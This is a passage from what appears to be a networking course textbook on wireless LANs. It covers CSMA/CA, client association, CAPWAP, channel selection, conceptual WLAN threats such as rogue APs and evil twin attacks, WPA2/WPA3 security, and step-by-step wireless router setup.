To resolve this problem, WLANs use carrier sense multiple access with collision avoidance (CSMA/CA) as the
method to determine how and when to send data on the network. A wireless client does the following:

1. Listens to the channel to see if it is idle, which means that is senses no other traffic is currently on the
channel. The channel is also called the carrier.
2. Sends a request to send (RTS) message to the AP to request dedicated access to the network.
3. Receives a clear to send (CTS) message from the AP granting access to send.
4. If the wireless client does not receive a CTS message, it waits a random amount of time before restarting
the process.
5. After it receives the CTS, it transmits the data.
6. All transmissions are acknowledged. If a wireless client does not receive an acknowledgment, it assumes
a collision occurred and restarts the process.

12.3.6 Wireless Client and AP Association

For wireless devices to communicate over a network, they must first associate with an AP or wireless router.
An important part of the 802.11 process is discovering a WLAN and subsequently connecting to it. Wireless
devices complete the following three stage process, as shown in the figure:

• Discover a wireless AP
• Authenticate with AP
• Associate with AP

In order to have a successful association, a wireless client and an AP must agree on specific parameters.
Parameters must then be configured on the AP and subsequently on the client to enable the negotiation of a
successful association.

• SSID -The SSID name appears in the list of available wireless networks on a client. In larger
organizations that use multiple VLANs to segment traffic, each SSID is mapped to one VLAN.
Depending on the network configuration, several APs on a network can share a common SSID.
• Password - This is required from the wireless client to authenticate to the AP.
• Network mode - This refers to the 802.11a/b/g/n/ac/ad WLAN standards. APs and wireless routers
can operate in a Mixed mode meaning that they can simultaneously support clients connecting via
multiple standards.
• Security mode - This refers to the security parameter settings, such as WEP, WPA, or WPA2. Always
enable the highest security level supported.
• Channel settings - This refers to the frequency bands used to transmit wireless data. Wireless
routers and APs can scan the radio frequency channels and automatically select an appropriate
channel setting. The channel can also be set manually if there is interference with another AP or
wireless device.

89
12.3.7 Passive and Active Discover Mode

Wireless devices must discover and connect to an AP or wireless router. Wireless clients connect to the AP
using a scanning (probing) process. This process can be passive or active.

Passive mode

In passive mode, the AP openly advertises its service by periodically sending broadcast beacon frames
containing the SSID, supported standards, and security settings. The primary purpose of the beacon is to
allow wireless clients to learn which networks and APs are available in a given area. This allows the wireless
clients to choose which network and AP to use.

Active mode

In active mode, wireless clients must know the name of the SSID. The wireless client initiates the process by
broadcasting a probe request frame on multiple channels. The probe request includes the SSID name and
standards supported. APs configured with the SSID will send a probe response that includes the SSID,
supported standards, and security settings. Active mode may be required if an AP or wireless router is
configured to not broadcast beacon frames.

A wireless client could also send a probe request without a SSID name to discover nearby WLAN networks.
APs configured to broadcast beacon frames would respond to the wireless client with a probe response and
provide the SSID name. APs with the broadcast SSID feature disabled do not respond.

90
12.3.8 Check Your Understanding – WLAN Operation

91
12.4 CAPWAP Operation

12.4.1 Video – CAPWAP

In the previous topic you learned about WLAN operation. Now you will learn about Control and Provisioning of
Wireless Access Points (CAPWAP).

Click Play to view a video about Control and Provisioning of Wireless Access Points (CAPWAP) protocol

12.4.2 Introduction to CAPWAP

CAPWAP is an IEEE standard protocol that enables a WLC to manage multiple APs and WLANs. CAPWAP is
also responsible for the encapsulation and forwarding of WLAN client traffic between an AP and a WLC.

CAPWAP is based on LWAPP but adds additional security with Datagram Transport Layer Security (DTLS).
CAPWAP establishes tunnels on User Datagram Protocol (UDP) ports. CAPWAP can operate either over IPv4
or IPv6, as shown in the figure, but uses IPv4 by default.

IPv4 and IPv6 both use UDP ports 5246 and 5247. Port 5246 is for CAPWAP control messages used by the
WLC to manage the AP. Port 5247 is used by CAPWAP to encapsulate data packets traveling to and from

92
wireless clients. However, CAPWAP tunnels use different IP protocols in the packet header. IPv4 uses IP
protocol 17 and IPv6 uses IP protocol 136.

12.4.3 Split MAC Architecture

A key component of CAPWAP is the concept of a split media access control (MAC). The CAPWAP split MAC
concept does all of the functions normally performed by individual APs and distributes them between two
functional components:

• AP MAC Functions
• WLC MAC Functions

The table shows some of the MAC functions performed by each.

WLC (WLAN Controllers) MAC

AP MAC Functions
Functions

Beacons and probe

Authentication
responses

Packet
Association and re-association of
acknowledgements and
roaming clients
retransmissions

Frame queueing and Frame translation to other

packet prioritization protocols

MAC layer data Termination of 802.11 traffic on a

encryption and decryption wired interface

12.4.4 Datagram Transport Layer Security (DTLS) Encryption

DTLS is a protocol which provides security between the AP and the WLC. It allows them to communicate
using encryption and prevents eavesdropping or tampering.

93
DTLS is enabled by default to secure the CAPWAP control channel but is disabled by default for the data
channel, as shown in the figure. All CAPWAP management and control traffic exchanged between an AP and
WLC is encrypted and secured by default to provide control plane privacy and prevent Man-In-the-Middle
(MITM) attacks.

CAPWAP data encryption is optional and is enabled per AP. Data encryption requires a DTLS license to be
installed on the WLC prior to being enabled on an AP. When enabled, all WLAN client traffic is encrypted at
the AP before being forwarded to the WLC and vice versa.

12.4.5 FlexConnect APS

FlexConnect is a wireless solution for branch office and remote office deployments. It lets you configure and
control access points in a branch office from the corporate office through a WAN link, without deploying a
controller in each office.

There are two modes of operation for the FlexConnect AP.

• Connected mode - The WLC is reachable. In this mode the FlexConnect AP has CAPWAP
connectivity with its WLC and can send traffic through the CAPWAP tunnel, as shown in the figure.
The WLC performs all its CAPWAP functions.
• Standalone mode - The WLC is unreachable. The FlexConnect has lost or failed to establish
CAPWAP connectivity with its WLC. In this mode, a FlexConnect AP can assume some of the WLC
functions such as switching client data traffic locally and performing client authentication locally.

94
12.4.6 Check Your Understanding – CAPWAP Operation

95
96
12.5 Channel Management
12.5.1 Frequency Channel Saturation

Wireless LAN devices have transmitters and receivers tuned to specific frequencies of radio waves to
communicate. A common practice is for frequencies to be allocated as ranges. Such ranges are then split into
smaller ranges called channels.

If the demand for a specific channel is too high, that channel is likely to become oversaturated. The saturation
of the wireless medium degrades the quality of the communication. Over the years, a number of techniques
have been created to improve wireless communication and alleviate saturation. These techniques mitigate
channel saturation by using the channels in a more efficient way.

Direct-Sequence Spread Spectrum (DSSS)

This is a modulation technique designed to spread a signal over a larger frequency band. Spread spectrum
techniques were developed during war time to make it more difficult for enemies to intercept or jam a
communication signal. It does this by spreading the signal over a wider frequency which effectively hides the
discernable peak of the signal, as shown in the figure. A properly configured receiver can reverse the DSSS
modulation and re-construct the original signal. DSSS is used by 802.11b devices to avoid interference from
other devices using the same 2.4 GHz frequency.

97
Frequency-Hopping Spread Spectrum (FHSS)

This relies on spread spectrum methods to communicate. It transmits radio signals by rapidly switching a
carrier signal among many frequency channels. With the FHSS, the sender and receiver must be
synchronized to “know” which channel to jump to. This channel hopping process allows for a more efficient
usage of the channels, decreasing channel congestion. FHSS was used by the original 802.11 standard.
Walkie-talkies and 900 MHz cordless phones also use FHSS, and Bluetooth uses a variation of FHSS.

Orthogonal Frequency-Division Multiplexing (OFDM)

This is a subset of frequency division multiplexing in which a single channel uses multiple sub-channels on
adjacent frequencies. Sub-channels in an OFDM system are precisely orthogonal to one another which allow
the sub-channels to overlap without interfering. OFDM is used by a number of communication systems
including 802.11a/g/n/ac. The new 802.11ax uses a variation of OFDM called Orthogonal frequency-division
multiaccess (OFDMA).

98
12.5.2 Channel Selection

A best practice for WLANs requiring multiple APs is to use non-overlapping channels. For example, the
802.11b/g/n standards operate in the 2.4 GHz to 2.5 GHz spectrum. The 2.4 GHz band is subdivided into
multiple channels. Each channel is allotted 22 MHz bandwidth and is separated from the next channel by 5
MHz. The 802.11b standard identifies 11 channels for North America, as shown in the figure (13 in Europe
and 14 in Japan).

Note: Search the internet for 2.4 GHz channels to learn more about the variations for different countries.

The figure shows 11 channels that are 22MHz wide and 5MHz between each. The spectrum is between
2.2GHz and 2.5GHz.

2.4 GHz Overlapping Channels in North America

Interference occurs when one signal overlaps a channel reserved for another signal, causing possible
distortion. The best practice for 2.4 GHz WLANs that require multiple APs is to use non-overlapping channels,
although most modern APs will do this automatically. If there are three adjacent APs, use channels 1, 6, and
11, as shown in the figure

2.4 GHz Non-Overlapping Channels for 802.11b/g/n

For the 5 GHz standards 802.11a/n/ac, there are 24 channels. The 5 GHz band is divided into three sections.
Each channel is separated from the next channel by 20 MHz. The figure shows all 24 Unlicensed National
Information Infrastructure (U-NNI) 24 channels for the 5 GHz band. Although there is a slight overlap at the
tails of each channel's frequency, the channels do not interfere with one another. 5 GHz wireless can provide
faster data transmission for wireless clients in heavily populated wireless networks because of the large
amount of non-overlapping wireless channels.

Note: Search the internet for 5 GHz channels to learn more about the variations for different countries.

The figure shows 8 channels that have 20MHz between each. The spectrum is between 5150 MHz and 5350
MHz.

99
5 GHz First Eight Non-Interfering Channels

As with 2.4 GHz WLANs, choose non-interfering channels when configuring multiple 5 GHz APs that are
adjacent to each other, as shown in the figure.

5 GHz Non-Interfering Channels for 802.11a/n/ac

12.5.3 Plan and WLAN Deployment

The number of users supported by a WLAN depends on the geographical layout of the facility, including the
number of bodies and devices that can fit in a space, the data rates users expect, the use of non-overlapping
channels by multiple APs in an ESS, and transmit power settings.

When planning the location of APs, the approximate circular coverage area is important (as shown in the
figure), but there are some additional recommendations:

• If APs are to use existing wiring or if there are locations where APs cannot be placed, note these locations
on the map.
• Note all potential sources of interference which can include microwave ovens, wireless video cameras,
fluorescent lights, motion detectors, or any other device that uses the 2.4 GHz range.
• Position APs above obstructions.
• Position APs vertically near the ceiling in the center of each coverage area, if possible.
• Position APs in locations where users are expected to be. For example, conference rooms are typically a
better location for APs than a hallway.
• If an IEEE 802.11 network has been configured for mixed mode, the wireless clients may experience
slower than normal speeds in order to support the older wireless standards.

100
When estimating the expected coverage area of an AP, realize that this value varies depending on the WLAN
standard or mix of standards that are deployed, the nature of the facility, and the transmit power that the AP is
configured for. Always consult the specifications for the AP when planning for coverage areas.

12.5.4 Check Your Understanding – Channel Management

101
12.6 WLAN Threats

12.6.1 Video – WLAN Threats

The previous topics covered the WLAN components and configuration. Here you will learn about WLAN
threats.

Click Play to view a video about threats to WLANs.

102
 12.6.2 Wireless Security Overview

A WLAN is open to anyone within range of an AP and the appropriate credentials to associate to it. With a
wireless NIC and knowledge of cracking techniques, an attacker may not have to physically enter the
workplace to gain access to a WLAN.

Attacks can be generated by outsiders, disgruntled employees, and even unintentionally by employees.
Wireless networks are specifically susceptible to several threats, including:

• Interception of data - Wireless data should be encrypted to prevent it from being read by eavesdroppers.
• Wireless intruders - Unauthorized users attempting to access network resources can be deterred through
effective authentication techniques.
• Denial of Service (DoS) Attacks - Access to WLAN services can be compromised either accidentally or
maliciously. Various solutions exist depending on the source of the DoS attack.
• Rogue APs - Unauthorized APs installed by a well-intentioned user or for malicious purposes can be detected
using management software.

12.6.3 DoS Attacks

Wireless DoS attacks can be the result of:

• Improperly configured devices - Configuration errors can disable the WLAN. For instance, an administrator
could accidently alter a configuration and disable the network, or an intruder with administrator privileges could
intentionally disable a WLAN.
• A malicious user intentionally interfering with the wireless communication - Their goal is to disable the
wireless network completely or to the point where no legitimate device can access the medium.
• Accidental interference - WLANs are prone to interference from other wireless devices including microwave
ovens, cordless phones, baby monitors, and more, as shown in the figure. The 2.4 GHz band is more prone to
interference than the 5 GHz band.

12.6.4 Rogue Access Point

A rogue AP is an AP or wireless router that has been connected to a corporate network without explicit
authorization and against corporate policy. Anyone with access to the premises can install (maliciously or non-
maliciously) an inexpensive wireless router that can potentially allow access to a secure network resource.

Once connected, the rogue AP can be used by an attacker to capture MAC addresses, capture data packets,
gain access to network resources, or launch a man-in-the-middle attack.

103
A personal network hotspot could also be used as a rogue AP. For example, a user with secure network
access enables their authorized Windows host to become a Wi-Fi AP. Doing so circumvents the security
measures and other unauthorized devices can now access network resources as a shared device.

To prevent the installation of rogue APs, organizations must configure WLCs with rogue AP policies, as shown
in the figure, and use monitoring software to actively monitor the radio spectrum for unauthorized APs.

12.6.5 Man in-the-Middle Attack

In a man-in-the-middle (MITM) attack, the hacker is positioned in between two legitimate entities in order to
read or modify the data that passes between the two parties. There are many ways in which to create a MITM
attack.

A popular wireless MITM attack is called the “evil twin AP” attack, where an attacker introduces a rogue AP
and configures it with the same SSID as a legitimate AP, as shown in the figure. Locations offering free Wi-Fi,
such as airports, cafes, and restaurants, are particularly popular spots for this type of attack due to the open
authentication.

a threat actor at Bobs Latte has used their laptop to set up an evil twin using an SSID of Bob latte, open
authentication, and channel 6

104
Wireless clients attempting to connect to a WLAN would see two APs with the same SSID offering wireless
access. Those near the rogue AP find the stronger signal and most likely associate with it. User traffic is now
sent to the rogue AP, which in turn captures the data and forwards it to the legitimate AP, as shown in the
figure. Return traffic from the legitimate AP is sent to the rogue AP, captured, and then forwarded to the
unsuspecting user. The attacker can steal the user’s passwords, personal information, gain access to their
device, and compromise the system.

Defeating an attack like an MITM attack depends on the sophistication of the WLAN infrastructure and the
vigilance in monitoring activity on the network. The process begins with identifying legitimate devices on the
WLAN. To do this, users must be authenticated. After all of the legitimate devices are known, the network can
be monitored for abnormal devices or traffic.

12.6.6 Check Your Understanding – WLAN Threats

105
12.7 Secure WLANs

12.7.1 Video – Secure WLANs

The previous topic explained the WLAN threats. What can you do to secure the WLAN?

Click Play to view a video about techniques for securing WLANs.

12.7.2 SSID Cloaking and MAC Address Filtering

Wireless signals can travel through solid matter, such as ceilings, floors, walls, outside of the home, or office
space. Without stringent security measures in place, installing a WLAN can be the equivalent of putting
Ethernet ports everywhere, even outside.

To address the threats of keeping wireless intruders out and protecting data, two early security features
were used and are still available on most routers and APs: SSID cloaking and MAC address filtering.

SSID Cloaking

APs and some wireless routers allow the SSID beacon frame to be disabled, as shown in the figure. Wireless
clients must manually configure the SSID to connect to the network.

106
MAC Addresses Filtering

An administrator can manually permit or deny clients wireless access based on their physical MAC hardware
address. In the figure, the router is configured to permit two MAC addresses. Devices with different MAC
addresses will not be able to join the 2.4GHz WLAN.

12.7.3 802.11 Original Authentication Methods

Although these two features would deter most users, the reality is that neither SSID cloaking nor MAC address
filtering would deter a crafty intruder. SSIDs are easily discovered even if APs do not broadcast them and
MAC addresses can be spoofed. The best way to secure a wireless network is to use authentication and
encryption systems.

Two types of authentication were introduced with the original 802.11 standard:

• Open system authentication - Any wireless client should easily be able to connect and should only
be used in situations where security is of no concern, such as those providing free internet access like
cafes, hotels, and in remote areas. The wireless client is responsible for providing security such as
using a virtual private network (VPN) to connect securely. VPNs provide authentication and encryption
services. VPNs are beyond the scope of this topic.
• Shared key authentication - Provides mechanisms, such as WEP, WPA, WPA2, and WPA3 to
authenticate and encrypt data between a wireless client and AP. However, the password must be pre-
shared between both parties to connect.

The following chart summarizes these authentication methods.

107
12.7.4 Shared Key Authentication Methods

There are four shared key authentication techniques available, as described in the table. Until the availability
of WPA3 devices becomes ubiquitous, wireless networks should use the WPA2 standard.
Authentication
Description
Method

The original 802.11 specification designed to secure the data using the Rivest Cipher 4
Wired
(RC4)encryption method with a static key. However, the key never changes when
Equivalent
exchanging packets. This makes it easy to hack. WEP is no longer recommended and
Privacy (WEP)
should never be used.

A Wi-Fi Alliance standard that uses WEP, but secures the data with the much stronger
Wi-Fi Protected
Temporal Key Integrity Protocol (TKIP) encryption algorithm. TKIP changes the key for
Access (WPA)
each packet, making it much more difficult to hack.

WPA2 is the current industry standard for securing wireless networks. It uses the
WPA2 Advanced Encryption Standard (AES) for encryption. AES is currently considered the
strongest encryption protocol.

The next generation of Wi-Fi security. All WPA3-enabled devices use the latest
security methods, disallow outdated legacy protocols, and require the use of Protected
WPA3
Management Frames (PMF). However, devices with WPA3 are not yet readily
available.

12.7.5 Authenticating a Home User

Home routers typically have two choices for authentication: WPA and WPA2. WPA2 is the stronger of the
two. The figure shows the option to select one of two WPA2 authentication methods:

• Personal - Intended for home or small office networks, users authenticate using a pre-shared key
(PSK). Wireless clients authenticate with the wireless router using a pre-shared password. No special
authentication server is required.
• Enterprise - Intended for enterprise networks but requires a Remote Authentication Dial-In User
Service (RADIUS) authentication server. Although more complicated to set up, it provides additional

108
 security. The device must be authenticated by the RADIUS server and then users must authenticate
using 802.1X standard, which uses the Extensible Authentication Protocol (EAP) for authentication.

In the figure, the administrator is configuring the wireless router with WPA2 Personal authentication on the 2.4
GHz band.

12.7.6 Encryption Methods

Encryption is used to protect data. If an intruder has captured encrypted data, they would not be able to
decipher it in any reasonable amount of time.

The WPA and WPA2 standards use the following encryption protocols:

• Temporal Key Integrity Protocol (TKIP) - TKIP is the encryption method used by WPA. It provides
support for legacy WLAN equipment by addressing the original flaws associated with the 802.11 WEP
encryption method. It makes use of WEP, but encrypts the Layer 2 payload using TKIP, and carries out a
Message Integrity Check (MIC) in the encrypted packet to ensure the message has not been altered.
• Advanced Encryption Standard (AES) - AES is the encryption method used by WPA2. It is the preferred
method because it is a far stronger method of encryption. It uses the Counter Cipher Mode with Block
Chaining Message Authentication Code Protocol (CCMP) that allows destination hosts to recognize if the
encrypted and non-encrypted bits have been altered.

In the figure, the administrator is configuring the wireless router to use WPA2 with AES encryption on the 2.4
GHz band.

109
12.7.7 Authentication in the Enterprise

In networks that have stricter security requirements, an additional authentication or login is required to grant
wireless clients such access. The Enterprise security mode choice requires an Authentication, Authorization,
and Accounting (AAA) RADIUS server.

• RADIUS Server IP address - This is the reachable address of the RADIUS server.
• UDP port numbers - Officially assigned UDP ports 1812 for RADIUS Authentication, and 1813 for
RADIUS Accounting, but can also operate using UDP ports 1645 and 1646, as shown in the figure.
• Shared key - Used to authenticate the AP with the RADIUS server.

In the figure, the administrator is configuring the wireless router with WPA2 Enterprise authentication using
AES encryption. The RADIUS server IPv4 address is configured as well with a strong password to be used
between the wireless router and the RADIUS server.

The shared key is not a parameter that must be configured on a wireless client. It is only required on the AP to
authenticate with the RADIUS server. User authentication and authorization is handled by the 802.1X
standard, which provides a centralized, server-based authentication of end users.

The 802.1X login process uses EAP to communicate with the AP and RADIUS server. EAP is a framework for
authenticating network access. It can provide a secure authentication mechanism and negotiate a secure
private key which can then be used for a wireless encryption session using TKIP or AES encryption.

12.7.8 WPA 3

At the time of this writing, devices that support WPA3 authentication were not readily available. However,
WPA2 is no longer considered secure. WPA3, if available, is the recommended 802.11 authentication method.
WPA3 includes four features:

• WPA3-Personal
• WPA3-Enterprise
• Open Networks
• Internet of Things (IoT) Onboarding

WPA3-Personal

In WPA2-Personal, threat actors can listen in on the “handshake” between a wireless client and the AP and
use a brute force attack to try and guess the PSK. WPA3-Personal thwarts this attack by using Simultaneous

110
Authentication of Equals (SAE), a feature specified in the IEEE 802.11-2016. The PSK is never exposed,
making it impossible for the threat actor to guess.

WPA3-Enterprise

WPA3-Enterprise still uses 802.1X/EAP authentication. However, it requires the use of a 192-bit cryptographic
suite and eliminates the mixing of security protocols for previous 802.11 standards. WPA3-Enterprise adheres
to the Commercial National Security Algorithm (CNSA) Suite which is commonly used in high security Wi-Fi
networks.

Open Networks

Open networks in WPA2 send user traffic in unauthenticated, clear text. In WPA3, open or public Wi-Fi
networks still do not use any authentication. However, they do use Opportunistic Wireless Encryption (OWE)
to encrypt all wireless traffic.

IoT Onboarding

Although WPA2 included Wi-Fi Protected Setup (WPS) to quickly onboard devices without configuring them
first, WPS is vulnerable to a variety of attacks and is not recommended. Furthermore, IoT devices are typically
headless, meaning they have no built-in GUI for configuration, and needed any easy way to get connected to
the wireless network. The Device Provisioning Protocol (DPP) was designed to address this need. Each
headless device has a hardcoded public key. The key is typically stamped on the outside of the device or its
packaging as a Quick Response (QR) code. The network administrator can scan the QR code and quickly
onboard the device. Although not strictly part of the WPA3 standard, DPP will replace WPS over time.

12.7.9 Check Your Understanding – Secure WLANs

111
112
12.8 Module Practice and Quiz

12.8.1 What did I learn in this module?

A Wireless LAN (WLAN) is a type of wireless network that is commonly used in homes, offices, and campus
environments. Wireless networks are based on IEEE standards and can be classified into four main types:
WPAN, WLAN, WMAN, and WWAN. Wireless LAN technologies uses the unlicensed radio spectrum to send
and receive data. Examples of this technology are Bluetooth, WiMAX, Cellular Broadband, and Satellite
Broadband. The IEEE 802.11 WLAN standards define how radio frequencies are used for wireless links.
WLAN networks operate in the 2.4 GHz frequency band and the 5 GHz band. Standards ensure
interoperability between devices that are made by different manufacturers. Internationally, the three
organizations influencing WLAN standards are the ITU-R, the IEEE, and the Wi-Fi Alliance.

To communicate wirelessly, most devices include integrated wireless NICs that incorporate a radio
transmitter/receiver. The wireless router serves as an access point, a switch, and a router. Wireless clients
use their wireless NIC to discover nearby APs advertising their SSID. Clients then attempt to associate and
authenticate with an AP. After being authenticated, wireless users have access to network resources. APs can
be categorized as either autonomous APs or controller-based APs. There are three types of antennas for
business class APs: omnidirectional, directional, and MIMO.

The 802.11 standard identifies two main wireless topology modes: Ad hoc mode and Infrastructure
mode. Tethering is used to provide quick wireless access. Infrastructure mode defines two topology building
blocks: A Basic Service Set (BSS) and an Extended Service Set (ESS). All 802.11 wireless frames contain the
following fields: frame control, duration, address 1, address 2, address 3, sequence control, address 4,
payload, and FCS. WLANs use CSMA/CA as the method to determine how and when to send data on the
network. Part of the 802.11 process is discovering a WLAN and subsequently connecting to it. Wireless
devices discover a wireless AP, authenticate with it, and then associate with it. Wireless clients connect to the
AP using a scanning process which may be passive or active.

CAPWAP is an IEEE standard protocol that enables a WLC to manage multiple APs and WLANs. The
CAPWAP split MAC concept does all of the functions normally performed by individual APs and distributes
them between two functional components: AP MAC functions and WLC MAC functions. DTLS is a protocol
which provides security between the AP and the WLC. FlexConnect is a wireless solution for branch office and
remote office deployments. You configure and control access points in a branch office from the corporate
office through a WAN link, without deploying a controller in each office. There are two modes of operation for
the FlexConnect AP: connected and standalone.

Wireless LAN devices have transmitters and receivers tuned to specific frequencies of radio waves to
communicate. Frequencies are allocated as ranges. Ranges are then split into smaller ranges called
channels: DSSS, FHSS, and OFDM. The 802.11b/g/n standards operate in the 2.4 GHz to 2.5GHz spectrum.
The 2.4 GHz band is subdivided into multiple channels. Each channel is allotted 22 MHz bandwidth and is
separated from the next channel by 5 MHz. When planning the location of APs, the approximate circular
coverage area is important.

Wireless networks are susceptible to threats, including: data interception, wireless intruders, DoS attacks, and
rogue APs. Wireless DoS attacks can be the result of: improperly configured devices, a malicious user
intentionally interfering with the wireless communication, and accidental interference. A rogue AP is an AP or
wireless router that has been connected to a corporate network without explicit authorization. When
connected, a threat actor can use the rogue AP to capture MAC addresses, capture data packets, gain access
to network resources, or launch a MITM attack. In a MITM attack, the threat actor is positioned in between two
legitimate entities to read or modify the data that passes between the two parties. A popular wireless MITM
attack is called the “evil twin AP” attack, where a threat actor introduces a rogue AP and configures it with the

113
same SSID as a legitimate AP. To prevent the installation of rogue APs, organizations must configure WLCs
with rogue AP policies.

To keep wireless intruders out and protect data, two early security features are still available on most routers
and APs: SSID cloaking and MAC address filtering. There are four shared key authentication techniques
available: WEP, WPA, WPA2, and WPA3 (Devices with WPA3 are not yet readily available). Home routers
typically have two choices for authentication: WPA and WPA2. WPA2 is the stronger of the two. Encryption is
used to protect data. The WPA and WPA2 standards use the following encryption protocols: TKIP and AES. In
networks that have stricter security requirements, an additional authentication or login is required to grant
wireless clients access. The Enterprise security mode choice requires an Authentication, Authorization, and
Accounting (AAA) RADIUS server.

12.8.2 Module Quiz – WLAN Concepts

114
115
116
117
118
13 WLAN Configuration
13.0.1 Why should I take this module?

Welcome to WLAN Configuration!

Some of us remember getting on the internet using dial up. Dial up involved using your landline phone. Your
landline phone was unavailable to make or receive calls while you were on the internet. Your dial up
connection to the internet was very slow. It basically meant that, for most people, your computer was always in
one place in your home or school.

Then we were able to connect to the internet without using our landlines. But our computers were still
hardwired to the devices that connected them to the internet. Today we can connect to the internet using
wireless devices that lets us take our phones, laptops, and tablets almost anywhere. It’s nice to have this
freedom of movement, but it requires special end and intermediary devices and a good understanding of
wireless protocols. Want to know more? Then this is the module for you!

13.0.2 What Will I learn to do in this module?

Module Title: WLAN Configuration

Module Objective: Implement a WLAN using a wireless router and WLC.

Topic Title Topic Objective

Remote Site WLAN

Configure a WLAN to support a remote site.
Configuration

Configure a Basic WLAN Configure a WLC WLAN to use the management interface and WPA2
on the WLC PSK authentication.

Configure a WPA2
Configure a WLC WLAN to use a VLAN interface, a DHCP server, and
Enterprise WLAN on the
WPA2 Enterprise authentication.
WLC

Troubleshoot WLAN
Troubleshoot common wireless configuration issues.
Issues

13.1 Remote Site WLAN Configuration

13.1.1 Video – Configure a Wireless Network

Click Play in the figure to view a demonstration of how to configure a wireless network.

13.1.2 The Wireless Router

119
Remote workers, small branch offices, and home networks often use a small office and home router. These
routers are sometimes called an integrated router because they typically include a switch for wired clients, a
port for an internet connection (sometimes labeled “WAN”), and wireless components for wireless client
access, as shown for the Cisco Meraki MX64W in the figure. For the rest of this module, small office and
home routers are referred to as wireless routers.

Cisco Meraki MX64W

The next figure shows a topology depicting the physical connection of a wired laptop to the wireless router,
which is then connected to a cable or DSL modem for internet connectivity.

The figure depicts the physical connection of a wired laptop to the wireless router, which is then connected to
a cable or DSL modem for internet connectivity. It shows a person sitting at a computer desk. Connected to
the back of the desktop computer is a link going to a wireless router and from the wireless router theres a link
going to the broadband modem. The broadband modem has a serial connection to the Internet depicted by a
cloud.

These wireless routers typically provide WLAN security, DHCP services, integrated Name Address Translation
(NAT), quality of service (QoS), as well as a variety of other features. The feature set will vary based on the
router model.

Note: Cable or DSL modem configuration is usually done by the service provider’s representative either on-
site or remotely through a walkthrough with you on the phone. If you buy the modem, it will come with
documentation for how to connect it to your service provider which will most likely include contacting your
service provider for more information.

13.1.3 Log in to the Wireless Router

Most wireless routers are ready for service out of the box. They are preconfigured to be connected to the
network and provide services. For example, the wireless router uses DHCP to automatically provide
addressing information to connected devices. However, wireless router default IP addresses, usernames, and

120
passwords can easily be found on the internet. Just enter the search phrase “default wireless router IP
address” or “default wireless router passwords” to see a listing of many websites that provide this information.
For example, username and password for the wireless router in the figure is “admin”. Therefore, your first
priority should be to change these defaults for security reasons.

To gain access to the wireless router’s configuration GUI, open a web browser. In the address field, enter the
default IP address for your wireless router. The default IP address can be found in the documentation that
came with the wireless router or you can search the internet. The figure shows the IPv4 address [Link],
which is a common default for many manufacturers. A security window prompts for authorization to access the
router GUI. The word admin is commonly used as the default username and password. Again, check your
wireless router’s documentation or search the internet.

13.1.4 Basic Network Setup

Basic network setup includes the following steps:

1. Log in to the router from a web browser.

2. Change the default administrative password.
3. Log in with the new administrative password.
4. Change the default DHCP IPv4 addresses.
5. Renew the IP address.
6. Log in to the router with the new IP address.

1. Log in to the router from a web browser.

After logging in, a GUI opens. The GUI will have tabs or menus to help you navigate to various router
configuration tasks. It is often necessary to save the settings changed in one window before proceeding to
another window. At this point, it is a best practice to make changes to the default settings.

Click the next step.

121
2. Change the default administrative password.

To change the default login password, find the administration portion of the router’s GUI. In this example, the
Administration tab was selected. This is where the router password can be changed. On some devices, such
as the one in the example, you can only change the password. The username remains admin or whatever the
default username is for the router you are configuring.

Click the next step

3. Log in with the new administrative password.

After you save the new password, the wireless router will request authorization again. Enter the username and
new password, as shown in the example.

122
Click the next step.

4. Change the default DHCP IPv4 addresses.

Change the default router IPv4 address. It is a best practice to use private IPv4 addressing inside your
network. The IPv4 address [Link] is used in the example but it could be any private IPv4 address you
choose.

Click the next step.

5. Renew the IP address.

When you click save, you will temporarily lose access to the wireless router. Open a command window and
renew your IP address with the ipconfig /renew command, as shown in the example.

Click the next step.

123
6. Log in to the router with the new IP address.

Enter the router’s new IP address to regain access to the router configuration GUI, as shown in the example.
You are now ready to continue configuring the router for wireless access.

13.1.5 Basic Wireless Setup

Basic wireless setup includes the following steps:

1. View the WLAN defaults.

2. Change the network mode.
3. Configure the SSID.
4. Configure the channel.
5. Configure the security mode.
6. Configure the passphrase.

1. View the WLAN defaults.

Out of the box, a wireless router provides wireless access to devices using a default wireless network name
and password. The network name is called the Service Set Identified (SSID). Locate the basic wireless
settings for your router to change these defaults, as shown in the example.

Click the next step.

124
2. Change the network mode.

Some wireless routers allow you to select which 802.11 standard to implement. The example shows that
“Legacy” has been selected. This means wireless devices connecting to the wireless router can have a variety
of wireless NICs installed. Today’s wireless routers configured for legacy or mixed mode most likely support
802.11a, 802.11n, and 802.11ac NICs.

Click the next step.

125
3. Configure the SSID.

Assign an SSID to the WLANs. OfficeNet is used in the example for all three WLANs (the third WLAN is not
shown). The wireless router announces its presence by sending broadcasts advertising its SSID. This allows
wireless hosts to automatically discover the name of the wireless network. If the SSID broadcast is disabled,
you must manually enter the SSID on each wireless device that connects to the WLAN.

Click the next step.

4. Configure the channel.

Devices configured with the same channel within the 2.4GHz band may overlap and cause distortion, slowing
down the wireless performance and potentially break network connections. The solution to avoid interference
is to configure non-overlapping channels on the wireless routers and access points that are near to each
other. Specifically, channels 1, 6, and 11 are non-overlapping. In the example, the wireless router is
configured to use channel 6.

Click the next step.

126
5. Configure the security mode.

Out of the box, a wireless router may have no WLAN security configured. In the example, the personal version
of Wi-Fi Protected Access version 2 (WPA2 Personal) is selected for all three WLANs. WPA2 with Advanced
Encryption Standard (AES) encryption is currently the strongest security mode.

Click the next step.

6. Configure the passphrase.

WPA2 personal uses a passphrase to authenticate wireless clients. WPA2 personal is easier to use in a
small office or home environment because it does not require an authentication server. Larger organizations
implement WPA2 enterprise and require wireless clients to authenticate with a username and password.

13.1.6 Configure a Wireless Mesh Network

In a small office or home network, one wireless router may suffice to provide wireless access to all the clients.
However, if you want to extend the range beyond approximately 45 meters indoors and 90 meters outdoors,

127
you can add wireless access points. As shown in the wireless mesh network in the figure, two access points
are configured with the same WLAN settings from our previous example. Notice that the channels selected
are 1 and 11 so that the access points do not interfere with channel 6 configured previously on the wireless
router.

Extending a WLAN in a small office or home has become increasingly easier. Manufacturers have made
creating a wireless mesh network (WMN) simple through smartphone apps. You buy the system, disperse the
access points, plug them in, download the app, and configure your WMN in a few steps. Search the internet
for “best wi-fi mesh network system” to find reviews of current offerings.

13.1.7 NAT for IPV4

On a wireless router, if you look for a page like the Status page shown in the figure, you will find the IPv4
addressing information that the router uses to send data to the internet. Notice that the IPv4 address is
[Link] is a different network than the [Link] address assigned to the router’s LAN interface. All
the devices on the router’s LAN will get assigned addresses with the 10.10.10 prefix.

128
